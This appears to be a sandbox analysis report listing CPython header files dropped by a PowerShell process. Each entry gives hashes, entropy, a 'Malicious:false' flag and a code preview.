                              Preview:#ifndef Py_CPYTHON_PYLIFECYCLE_H..# error "this header file must not be included directly"..#endif..../* Py_FrozenMain is kept out of the Limited API until documented and present.. in all builds of Python */..PyAPI_FUNC(int) Py_FrozenMain(int argc, char **argv);..../* Only used by applications that embed the interpreter and need to.. * override the standard encoding determination mechanism.. */..Py_DEPRECATED(3.11) PyAPI_FUNC(int) Py_SetStandardStreamEncoding(.. const char *encoding,.. const char *errors);..../* PEP 432 Multi-phase initialization API (Private while provisional!) */....PyAPI_FUNC(PyStatus) Py_PreInitialize(.. const PyPreConfig *src_config);..PyAPI_FUNC(PyStatus) Py_PreInitializeFromBytesArgs(.. const PyPreConfig *src_config,.. Py_ssize_t argc,.. char **argv);..PyAPI_FUNC(PyStatus) Py_PreInitializeFromArgs(.. const PyPreConfig *src_config,.. Py_ssize_t argc,.. wchar_t **argv);....PyAPI_FUNC(int) _Py_IsCoreInitialized(void);....../* Initializ
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3477
                              Entropy (8bit):5.1286140259952795
                              Encrypted:false
                              SSDEEP:48:Wcgj7h1hKfuuw0hiNmpNzTHo7G97yXQLFUuGliSsvQdNZd65liN3q7lcPRsA4G4W:Wc4fwsr8HTwQA1XNZ8z030A4G4ogJy
                              MD5:E5E62995E21FDDB3F0B29DDAC77D7C9C
                              SHA1:ABFE1179761F2E7F714209DD84DE7CD0C2B80C69
                              SHA-256:4471EE830A01532450D95B83003DC2A8319267FB5ABBFBDEA20133DB0E640831
                              SHA-512:512C7A37D6AAF55431746BAD694A0BCF5BEC0D72CAC8FAECD808C8B733DB9A72AB00808E2D21A4DB5E48464FBBB4CF7F4BD75157E66EE7EC3859866408EBDCFD
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_PYMEM_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(void *) PyMem_RawMalloc(size_t size);..PyAPI_FUNC(void *) PyMem_RawCalloc(size_t nelem, size_t elsize);..PyAPI_FUNC(void *) PyMem_RawRealloc(void *ptr, size_t new_size);..PyAPI_FUNC(void) PyMem_RawFree(void *ptr);..../* Try to get the allocators name set by _PyMem_SetupAllocators(). */..PyAPI_FUNC(const char*) _PyMem_GetCurrentAllocatorName(void);..../* strdup() using PyMem_RawMalloc() */..PyAPI_FUNC(char *) _PyMem_RawStrdup(const char *str);..../* strdup() using PyMem_Malloc() */..PyAPI_FUNC(char *) _PyMem_Strdup(const char *str);..../* wcsdup() using PyMem_RawMalloc() */..PyAPI_FUNC(wchar_t*) _PyMem_RawWcsdup(const wchar_t *str);......typedef enum {.. /* PyMem_RawMalloc(), PyMem_RawRealloc() and PyMem_RawFree() */.. PYMEM_DOMAIN_RAW,.... /* PyMem_Malloc(), PyMem_Realloc() and PyMem_Free() */.. PYMEM_DOMAIN_MEM,.... /* PyObject_Malloc(), PyObject_Realloc() and PyO
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):17684
                              Entropy (8bit):4.890581331936376
                              Encrypted:false
                              SSDEEP:384:aG3E5IBh8kGj9684NiyRLHD1f1o4h5sOVX79wDMc:aG3KIv8QrFU4hL79wIc
                              MD5:97A2A818F681EC57524F50F49473EAC8
                              SHA1:D95280BF15F51B3FE639063CF2E72D8772BD0648
                              SHA-256:A2CE906E386C4896A862E4B2ED53733DE4E3C3C71923B50066E7A98AA099AEA0
                              SHA-512:F5090E91C0E36E9A2C7223399306003C906B338BE67533D8BB0C28A18574AD94ED808C2E7B0FB5D2AD5E52A6BC50AA4DE6E8A2B422C876986CF8D29DE8BBF78D
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_PYSTATE_H..# error "this header file must not be included directly"..#endif....../*..Runtime Feature Flags....Each flag indicate whether or not a specific runtime feature..is available in a given context. For example, forking the process..might not be allowed in the current interpreter (i.e. os.fork() would fail)...*/..../* Set if the interpreter share obmalloc runtime state.. with the main interpreter. */..#define Py_RTFLAGS_USE_MAIN_OBMALLOC (1UL << 5)..../* Set if import should check a module for subinterpreter support. */..#define Py_RTFLAGS_MULTI_INTERP_EXTENSIONS (1UL << 8)..../* Set if threads are allowed. */..#define Py_RTFLAGS_THREADS (1UL << 10)..../* Set if daemon threads are allowed. */..#define Py_RTFLAGS_DAEMON_THREADS (1UL << 11)..../* Set if os.fork() is allowed. */..#define Py_RTFLAGS_FORK (1UL << 15)..../* Set if os.exec*() is allowed. */..#define Py_RTFLAGS_EXEC (1UL << 16)......PyAPI_FUNC(int) _PyInterpreterState_HasFeature(PyInterpreterState
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5024
                              Entropy (8bit):5.074670184727984
                              Encrypted:false
                              SSDEEP:96:hfcTyk0Vew9T8e7ZkadKZ/cTJm2JMQMSoWa4wfe+kqXeqXcqW5lh:qTyk0Vew9we76adKZ/cT72eV5f
                              MD5:8377103014C3A1366D9C20E911313843
                              SHA1:2F4408695609B71F8BF8B2520F37AB7AA47F4199
                              SHA-256:9C415BC5DFCB585DBEF4034C8F74F8FFAE2844CB7864E67A155C5F9923D3613C
                              SHA-512:39863C5761EEBDDFC5DDF6CB4E93D72527451FD8FE7C41893A915C62C82162804AF7C97B1BAEC939B0F28DC7947D8F3236C31C0835734D34FBDE8B0F468EAC90
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_PYTHONRUN_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(int) PyRun_SimpleStringFlags(const char *, PyCompilerFlags *);..PyAPI_FUNC(int) _PyRun_SimpleFileObject(.. FILE *fp,.. PyObject *filename,.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_AnyFileExFlags(.. FILE *fp,.. const char *filename, /* decoded from the filesystem encoding */.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) _PyRun_AnyFileObject(.. FILE *fp,.. PyObject *filename,.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_SimpleFileExFlags(.. FILE *fp,.. const char *filename, /* decoded from the filesystem encoding */.. int closeit,.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_InteractiveOneFlags(.. FILE *fp,.. const char *filename, /* decoded from the filesystem encoding */.. PyCompilerFlags *flags);..PyAPI_FUNC(int) PyRun_InteractiveOneObject(
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1468
                              Entropy (8bit):5.1184739568883915
                              Encrypted:false
                              SSDEEP:24:twxibGLeGV9oc9raLUq3oZJM4TNYoZyt0ZqcBZZnRKQBxFCdVK//rxmxyovn:tcgY9gkGIZdTNYoZyt0Z9fNRLPFCdV2w
                              MD5:F1995D4E98C3E9167A5CE7D764F3240B
                              SHA1:AE44E07C00227C214F637A795E02FEB2985589AB
                              SHA-256:D5CBA29AC2A11A7D31296BD43E5262D28919C91FC1BDEDF9D60FECFDC7E100F0
                              SHA-512:382841A57688CA36630A956820370C8C305E0A31D43F1C478CAF864A01618590511B667051D1884A12A1E3A9D8F772F65B0CF6145E1CC29F13ED213AA4051394
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_PYTHREAD_H..# error "this header file must not be included directly"..#endif....#define PYTHREAD_INVALID_THREAD_ID ((unsigned long)-1)....#ifdef HAVE_FORK../* Private function to reinitialize a lock at fork in the child process... Reset the lock to the unlocked state... Return 0 on success, return -1 on error. */..PyAPI_FUNC(int) _PyThread_at_fork_reinit(PyThread_type_lock *lock);..#endif /* HAVE_FORK */....#ifdef HAVE_PTHREAD_H.. /* Darwin needs pthread.h to know type name the pthread_key_t. */..# include <pthread.h>..# define NATIVE_TSS_KEY_T pthread_key_t..#elif defined(NT_THREADS).. /* In Windows, native TSS key type is DWORD,.. but hardcode the unsigned long to avoid errors for include directive... */..# define NATIVE_TSS_KEY_T unsigned long..#elif defined(HAVE_PTHREAD_STUBS)..# include "cpython/pthread_stubs.h"..# define NATIVE_TSS_KEY_T pthread_key_t..#else..# error "Require native threads. See https://bugs.python.o
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):12706
                              Entropy (8bit):5.053869993604238
                              Encrypted:false
                              SSDEEP:384:CY5n/tXWPKCv5HjsEyy5oUpKQbIAPhF48TWO9BSY1Y8Ca:d5lXWPKo5HjsxOoUppIAJFfWO31Ca
                              MD5:6442F7D49EBD82022E00678B24EAB974
                              SHA1:6915A57D6D2ECAAEDEA4CD2F00EE6F87A4B8BEC8
                              SHA-256:D3E525D1BBD1DD162D834B691F4083D1BFD55288971CCB7BAE2F3ADF460ABBC8
                              SHA-512:77BC2919D2F4C1B9692F3BC32F1BC16EC5162117C6895452788D14C47086E42FBEC7BDAA4653A32EBF033B129C0D50C27226E3550B7FCF2593F33C9D06240C14
                              Malicious:false
                              Preview:// The _PyTime_t API is written to use timestamp and timeout values stored in..// various formats and to read clocks...//..// The _PyTime_t type is an integer to support directly common arithmetic..// operations like t1 + t2...//..// The _PyTime_t API supports a resolution of 1 nanosecond. The _PyTime_t type..// is signed to support negative timestamps. The supported range is around..// [-292.3 years; +292.3 years]. Using the Unix epoch (January 1st, 1970), the..// supported date range is around [1677-09-21; 2262-04-11]...//..// Formats:..//..// * seconds..// * seconds as a floating pointer number (C double)..// * milliseconds (10^-3 seconds)..// * microseconds (10^-6 seconds)..// * 100 nanoseconds (10^-7 seconds)..// * nanoseconds (10^-9 seconds)..// * timeval structure, 1 microsecond resolution (10^-6 seconds)..// * timespec structure, 1 nanosecond resolution (10^-9 seconds)..//..// Integer overflows are detected and raise OverflowError. Conversion to a..// resolution worse than 1 na
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2218
                              Entropy (8bit):4.946357429772549
                              Encrypted:false
                              SSDEEP:48:IgcgVVCOiFNh+TyrAefqIFAlUeFoRLnktGH:5cKFi5nfqIFsaRLktGH
                              MD5:890E79BA2C73F9EBE32EB8DBBD40EBBE
                              SHA1:DB868B233630426A8AD75F06D910329606E4490C
                              SHA-256:DAEA0D49FD15250859F20387B5BE4A6C85B6D01D810984D6B6E88263F328C069
                              SHA-512:10A22F7F47876BFCF9AFD649C58839F245883679360F4D974F381A8B0DE244AC99A2245BD0CA0A99569912E3F3922E74622575CAB8281740E51E60B7B7713CDB
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_SETOBJECT_H..# error "this header file must not be included directly"..#endif..../* There are three kinds of entries in the table:....1. Unused: key == NULL and hash == 0..2. Dummy: key == dummy and hash == -1..3. Active: key != NULL and key != dummy and hash != -1....The hash field of Unused slots is always zero.....The hash field of Dummy slots are set to -1..meaning that dummy entries can be detected by..either entry->key==dummy or by entry->hash==-1...*/....#define PySet_MINSIZE 8....typedef struct {.. PyObject *key;.. Py_hash_t hash; /* Cached hash code of the key */..} setentry;..../* The SetObject data structure is shared by set and frozenset objects.....Invariant for sets:.. - hash is -1....Invariants for frozensets:.. - data is immutable... - hash is the hash of the frozenset or -1 if not computed yet.....*/....typedef struct {.. PyObject_HEAD.... Py_ssize_t fill; /* Number active and dummy entries*/.. Py_ssize_t us
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):505
                              Entropy (8bit):4.99108483454011
                              Encrypted:false
                              SSDEEP:12:BSa/HQxib2E5nF36+Iq+JeqlSdd0J+7/vAn7pF:bwxibjlIpidSe6pF
                              MD5:58FECAA2AEB3B93428BEDAD8A547F304
                              SHA1:8150D2BF365DC611ED5EB8E5DBD9FA576285DA94
                              SHA-256:3DE1277A0D20F6C4258AD7B63C6AF9377D8EB2A66667CD1C5709616A1E466CB6
                              SHA-512:8D49D9C0A691922B6B633487EE0EAEBB0368D122B1441959BCAEC745CEE8760C19A60C48DE33F402D18FD4B8916FD7138D20512A98C9B7DF29D8ACC62B9B0FDE
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_SYSMODULE_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(PyObject *) _PySys_GetAttr(PyThreadState *tstate,.. PyObject *name);....PyAPI_FUNC(size_t) _PySys_GetSizeOf(PyObject *);....typedef int(*Py_AuditHookFunction)(const char *, PyObject *, void *);....PyAPI_FUNC(int) PySys_Audit(.. const char *event,.. const char *argFormat,.. ...);..PyAPI_FUNC(int) PySys_AddAuditHook(Py_AuditHookFunction, void*);..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):460
                              Entropy (8bit):4.99833604415647
                              Encrypted:false
                              SSDEEP:12:Bd2/HQxib2ERox0elhyLvu5lE02COWPdv:Uwxib+x0elhyLGE02ZWPdv
                              MD5:AEE42A8030D1AD6C1C51BA1B9D26966E
                              SHA1:C315296382339D2B5C05996A19B040EBA3F10417
                              SHA-256:0C8306BDD6F4D5ECE7DB4F798024F8B59527C314FABB12ADD093BECD41E9F687
                              SHA-512:816E8F902BD562D6EED69FEFF4B1DC90D34E95C8BD14DA0201D50D5A4FC3BC210A5B5925CE2F5E5DB7F033444789FD07F0C0A35C834F2B166426BFBF05367FA1
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_TRACEBACK_H..# error "this header file must not be included directly"..#endif....typedef struct _traceback PyTracebackObject;....struct _traceback {.. PyObject_HEAD.. PyTracebackObject *tb_next;.. PyFrameObject *tb_frame;.. int tb_lasti;.. int tb_lineno;..};....PyAPI_FUNC(int) _Py_DisplaySourceLine(PyObject *, PyObject *, int, int, int *, PyObject **);..PyAPI_FUNC(void) _PyTraceback_Add(const char *, const char *, int);..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1416
                              Entropy (8bit):5.217048189115929
                              Encrypted:false
                              SSDEEP:24:plwxib+xpKtf4Ssh3XBEGeA08u+r5JZzaYSxshSp+J+yJ52zLJYSfJo1G7G:XcgYpQlM5FJZ2YZbJ+yjELJYyJo1eG
                              MD5:48BD8528C0647BD552B28EBD495C270B
                              SHA1:8AFA53CA1F4A25C3D6688104AA6403925FC87170
                              SHA-256:71F4C54D1176F413217F0FC6041B3CFA86E76D692249E685DAE51427EFDC5818
                              SHA-512:64496D931E0D79E925672B06632BCE950BA10FD7534AE0438EC88CBA717F3CCA6452544F6A129944C30DCFCE7AB65228F89C016C7F78E2DC64F09DEF8F1693F7
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_TUPLEOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_VAR_HEAD.. /* ob_item contains space for 'ob_size' elements... Items must normally not be NULL, except during construction when.. the tuple is not yet visible outside the function that builds it. */.. PyObject *ob_item[1];..} PyTupleObject;....PyAPI_FUNC(int) _PyTuple_Resize(PyObject **, Py_ssize_t);..PyAPI_FUNC(void) _PyTuple_MaybeUntrack(PyObject *);..../* Cast argument to PyTupleObject* type. */..#define _PyTuple_CAST(op) \.. (assert(PyTuple_Check(op)), _Py_CAST(PyTupleObject*, (op)))....// Macros and static inline functions, trading safety for speed....static inline Py_ssize_t PyTuple_GET_SIZE(PyObject *op) {.. PyTupleObject *tuple = _PyTuple_CAST(op);.. return Py_SIZE(tuple);..}..#define PyTuple_GET_SIZE(op) PyTuple_GET_SIZE(_PyObject_CAST(op))....#define PyTuple_GET_ITEM(op, index) (_PyTuple_CAST(op)->ob_item[(index)])...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):35430
                              Entropy (8bit):5.092850151891502
                              Encrypted:false
                              SSDEEP:768:J5I1esU8jW8KHFuRsilJpIpZdk50vSC3MP:01eKp+1a
                              MD5:1AB0A7BFEC371897F3AA59B2F94BB100
                              SHA1:02677FC1EA7177593B850352ACAE2DA5F4BC0EDC
                              SHA-256:E30309CEF3121311C2909F98CAC72C681C9CD5D01289E10E86CD8F2172ABE8FE
                              SHA-512:060877D68A78B189DFE3ED697B26662730CF9A843C21508961732E8F0DFCC5C22153E134E86C6CE8B3743794847C90F56310F72AF0B5FD9029148C7B61686434
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_UNICODEOBJECT_H..# error "this header file must not be included directly"..#endif..../* Py_UNICODE was the native Unicode storage format (code unit) used by.. Python and represents a single Unicode element in the Unicode type... With PEP 393, Py_UNICODE is deprecated and replaced with a.. typedef to wchar_t. */..#define PY_UNICODE_TYPE wchar_t../* Py_DEPRECATED(3.3) */ typedef wchar_t Py_UNICODE;..../* --- Internal Unicode Operations ---------------------------------------- */....// Static inline functions to work with surrogates..static inline int Py_UNICODE_IS_SURROGATE(Py_UCS4 ch) {.. return (0xD800 <= ch && ch <= 0xDFFF);..}..static inline int Py_UNICODE_IS_HIGH_SURROGATE(Py_UCS4 ch) {.. return (0xD800 <= ch && ch <= 0xDBFF);..}..static inline int Py_UNICODE_IS_LOW_SURROGATE(Py_UCS4 ch) {.. return (0xDC00 <= ch && ch <= 0xDFFF);..}....// Join two surrogate characters and return a single Py_UCS4 value...static inline Py_UCS4 Py_UNICODE_JOIN_SURROGA
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):584
                              Entropy (8bit):5.0246901215639435
                              Encrypted:false
                              SSDEEP:12:BB/HQxib2E5nlBKFvaKXXTnl2eh8XXQ/KIBPlUcEov:vwxibvBuaWhl8Q/K69P
                              MD5:5D7E4BAB3FF84D842B58A08DD6BBFE4C
                              SHA1:7F04AFE50508FC045172174004C2DB195AD6B0BA
                              SHA-256:ED804F27A16BD31574F523D2539A6EFC97164AF32589DBE8363DF556E05754F2
                              SHA-512:D86459922DB9E96CD985870F4EAC5549FEBC68FFBA296322E47FC4C12E86573AC635C0737997291254739CC719AC3584A9C24AF42770AE639234909C7D10E02C
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_WARNINGS_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(int) PyErr_WarnExplicitObject(.. PyObject *category,.. PyObject *message,.. PyObject *filename,.. int lineno,.. PyObject *module,.. PyObject *registry);....PyAPI_FUNC(int) PyErr_WarnExplicitFormat(.. PyObject *category,.. const char *filename, int lineno,.. const char *module, PyObject *registry,.. const char *format, ...);....// DEPRECATED: Use PyErr_WarnEx() instead...#define PyErr_Warn(category, msg) PyErr_WarnEx((category), (msg), 1)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2088
                              Entropy (8bit):4.903128485553285
                              Encrypted:false
                              SSDEEP:48:gcgpsjf3htgu30YUqx9wdDYP7MYi3RAKaknYCShFL7fPxnBKiH:gcJx4Yj0dsPsakYHhFvfPxB/H
                              MD5:0CF27CC20309F2A1CBE835F3DD0C522E
                              SHA1:5DC1B78FEEE892C0BED430369C578E8FD038306B
                              SHA-256:F970FDF00AEFFC1EF6BC757118540B60FDCA99406FC9A7A844409A0D845E7A3F
                              SHA-512:E82A82EC26235E741A463C23A78D49FB3FF05827B5F264D0E27BAD40DF1ADFF523DBB6B785FDD88459D6211F617C9624DFA4119D7B378AAFE11475275D8EB28A
                              Malicious:false
                              Preview:#ifndef Py_CPYTHON_WEAKREFOBJECT_H..# error "this header file must not be included directly"..#endif..../* PyWeakReference is the base struct for the Python ReferenceType, ProxyType,.. * and CallableProxyType... */..struct _PyWeakReference {.. PyObject_HEAD.... /* The object to which this is a weak reference, or Py_None if none... * Note that this is a stealth reference: wr_object's refcount is.. * not incremented to reflect this pointer... */.. PyObject *wr_object;.... /* A callable to invoke when wr_object dies, or NULL if none. */.. PyObject *wr_callback;.... /* A cache for wr_object's hash code. As usual for hashes, this is -1.. * if the hash code isn't known yet... */.. Py_hash_t hash;.... /* If wr_object is weakly referenced, wr_object has a doubly-linked NULL-.. * terminated list of weak references to it. These are the list pointers... * If wr_object goes away, wr_object is set to Py_None, and these pointers.. * have no
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):10036
                              Entropy (8bit):5.122122897743283
                              Encrypted:false
                              SSDEEP:96:nSAPj/BvFx1QZU5f5kU+HnVfBTyOC8nhnwN9okQcp7owPuB/JqM/5qRkAu/vZEO:nnP9NrQZAfsHnBwI5hZxaO
                              MD5:5FEB604C021EB11655B90F0FC127431B
                              SHA1:D6BE8187547F9E4D0B1F3DE2919C28808269A4DE
                              SHA-256:19C1EA449F85E317BA55C23C95732A68F6203C777D8CF17F85C94D0C136EB9A2
                              SHA-512:D20FAB6A92490D97DDFA762963DFB8F577FE4F92DB9A3C5F4C4FB65BA80B4C5535CAC7B446538379F0E3E95A02D907D584915B0ED64E6CDEB6B0002A9BE974A0
                              Malicious:false
                              Preview:/* datetime.h.. */..#ifndef Py_LIMITED_API..#ifndef DATETIME_H..#define DATETIME_H..#ifdef __cplusplus..extern "C" {..#endif..../* Fields are packed into successive bytes, each viewed as unsigned and.. * big-endian, unless otherwise noted:.. *.. * byte offset.. * 0 year 2 bytes, 1-9999.. * 2 month 1 byte, 1-12.. * 3 day 1 byte, 1-31.. * 4 hour 1 byte, 0-23.. * 5 minute 1 byte, 0-59.. * 6 second 1 byte, 0-59.. * 7 usecond 3 bytes, 0-999999.. * 10.. */..../* # of bytes for year, month, and day. */..#define _PyDateTime_DATE_DATASIZE 4..../* # of bytes for hour, minute, second, and usecond. */..#define _PyDateTime_TIME_DATASIZE 6..../* # of bytes for year, month, day, hour, minute, second, and usecond. */..#define _PyDateTime_DATETIME_DATASIZE 10......typedef struct..{.. PyObject_HEAD.. Py_hash_t hashcode; /* -1 when unknown */.. int days; /* -MAX_DELTA_DAYS
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3180
                              Entropy (8bit):5.212921496890911
                              Encrypted:false
                              SSDEEP:48:ZfWwaGsI9t7GSuVlIi4KKY5XX/HKNJg+1ZQYSmFo:ZfWPo9t7GSuV2gfqQYSmFo
                              MD5:B29F59C74716C469F9C8182CB06A7802
                              SHA1:5DDC4AD0809AB3003E3EEE90086F90A93D156A76
                              SHA-256:2E4F09C249040A11C26428EAAA0619960A658DFDDC20ED34D3D4CF818F2A4867
                              SHA-512:A9D60B3BEDCA1937CB9C0C59E509053BD2C79C6E36C8088A1BBA457254674294041C4E58B5D4919798C5D17EC36A803D85194A1B68EEEC7264A387445ABBA990
                              Malicious:false
                              Preview:/* Descriptors */..#ifndef Py_DESCROBJECT_H..#define Py_DESCROBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....typedef PyObject *(*getter)(PyObject *, void *);..typedef int (*setter)(PyObject *, PyObject *, void *);....struct PyGetSetDef {.. const char *name;.. getter get;.. setter set;.. const char *doc;.. void *closure;..};....PyAPI_DATA(PyTypeObject) PyClassMethodDescr_Type;..PyAPI_DATA(PyTypeObject) PyGetSetDescr_Type;..PyAPI_DATA(PyTypeObject) PyMemberDescr_Type;..PyAPI_DATA(PyTypeObject) PyMethodDescr_Type;..PyAPI_DATA(PyTypeObject) PyWrapperDescr_Type;..PyAPI_DATA(PyTypeObject) PyDictProxy_Type;..PyAPI_DATA(PyTypeObject) PyProperty_Type;....PyAPI_FUNC(PyObject *) PyDescr_NewMethod(PyTypeObject *, PyMethodDef *);..PyAPI_FUNC(PyObject *) PyDescr_NewClassMethod(PyTypeObject *, PyMethodDef *);..PyAPI_FUNC(PyObject *) PyDescr_NewMember(PyTypeObject *, PyMemberDef *);..PyAPI_FUNC(PyObject *) PyDescr_NewGetSet(PyTypeObject *, PyGetSetDef *);....PyAPI_FUNC(PyObject *)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3957
                              Entropy (8bit):5.1908930842166825
                              Encrypted:false
                              SSDEEP:48:gMsfukOK4T5scN2CrOHex8FAEneZA3xAguRZJDA:gnFM9b4Crdx8XpfkZJDA
                              MD5:D20468E39BD51A166F7C86510A11212E
                              SHA1:693DBD03EC44BC8FAA850890931C045371A97D0D
                              SHA-256:5CF8D61D4B6C0CCBD3E25CBCF2C4C90CB59898A9B483B61F38049010C64464F5
                              SHA-512:980FF4A001EDAECF9928D8AF96CA678973001DD0185BBE01B18266132D27A942382AC1EB29DD1A06872DBA0A1DFC42EA5344EC969EDDD47A02C6A8A51E0A1916
                              Malicious:false
                              Preview:#ifndef Py_DICTOBJECT_H..#define Py_DICTOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* Dictionary object type -- mapping from hashable object to object */..../* The distribution includes a separate file, Objects/dictnotes.txt,.. describing explorations into dictionary design and optimization... It covers typical dictionary use patterns, the parameters for.. tuning dictionaries, and several ideas for possible optimizations...*/....PyAPI_DATA(PyTypeObject) PyDict_Type;....#define PyDict_Check(op) \.. PyType_FastSubclass(Py_TYPE(op), Py_TPFLAGS_DICT_SUBCLASS)..#define PyDict_CheckExact(op) Py_IS_TYPE((op), &PyDict_Type)....PyAPI_FUNC(PyObject *) PyDict_New(void);..PyAPI_FUNC(PyObject *) PyDict_GetItem(PyObject *mp, PyObject *key);..PyAPI_FUNC(PyObject *) PyDict_GetItemWithError(PyObject *mp, PyObject *key);..PyAPI_FUNC(int) PyDict_SetItem(PyObject *mp, PyObject *key, PyObject *item);..PyAPI_FUNC(int) PyDict_DelItem(PyObject *mp, PyObject *key);..PyAPI_FUNC(
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):22970
                              Entropy (8bit):5.103276806113682
                              Encrypted:false
                              SSDEEP:384:jrsZqwzgPjymk1Va56g4WAQRodgImv9USD5p2TIv4F7Z3iyGdUbC/:jAzgPjlkjaVAQRodhmv9pn2TDF93iyG1
                              MD5:4F07D9613490E5D737060B0B4C293ADC
                              SHA1:4D88371BAB39A92D9A660ADE90BF28D60148ABA5
                              SHA-256:BF89A0C7BF40CF5C97BED63BB8C9C25ED93544833BF4CFF483FAFAC8245C9B0F
                              SHA-512:A08DCDAF7082B1F7B091BC9D9ECBD7F6EF8FEA72B7798AC218407406EBDE591C3A38F3E410E4A17D63A44680B20D50BC04A4D558A7D4DCCE0C4BD39FD6CACE6C
                              Malicious:false
                              Preview:/* Copyright (c) 2008-2009, Google Inc... * All rights reserved... *.. * Redistribution and use in source and binary forms, with or without.. * modification, are permitted provided that the following conditions are.. * met:.. *.. * * Redistributions of source code must retain the above copyright.. * notice, this list of conditions and the following disclaimer... * * Neither the name of Google Inc. nor the names of its.. * contributors may be used to endorse or promote products derived from.. * this software without specific prior written permission... *.. * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.. * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.. * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.. * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT.. * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,.. * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):270
                              Entropy (8bit):5.124776919282634
                              Encrypted:false
                              SSDEEP:3:YkLko+6P2Q0Pjo+6h8FOQI28AGRKmGjQ6QMtZb6TzJ581iHe7YJ581DFEvGHGjQc:BD2Q0u8Ad2xjQ6z3ueBhG5jQ6dKQ
                              MD5:EF325605B8543385361518B5851C081C
                              SHA1:E5547AAF812F76ADD841C4DD473EF6B87F9BF5D3
                              SHA-256:469C8A7BBCA8A67FD17BC728A1D6D4225C4C0566475774B5DEB655462F058659
                              SHA-512:A7A676339EA79E81D82B59A298DB0F9C3A2E304592828FD95903017F2613EF049AAA13B89C87A7ACEBE45A7B8B9F938E7A05802FC42CD75E40D1C025D99E2E9E
                              Malicious:false
                              Preview:#ifndef Py_ENUMOBJECT_H..#define Py_ENUMOBJECT_H..../* Enumerate Object */....#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyEnum_Type;..PyAPI_DATA(PyTypeObject) PyReversed_Type;....#ifdef __cplusplus..}..#endif....#endif /* !Py_ENUMOBJECT_H */..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:C source, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1817
                              Entropy (8bit):4.645101362811805
                              Encrypted:false
                              SSDEEP:24:UsYLLCAHrNiZVUUmcF8r6F4d1sjlFgt2veBKAAscjNC6wH//CLcB+Ek/:8brQUi8sjXMKg2wHccB+p/
                              MD5:07679B5432B9FEF1FE8FC28AAC2FC591
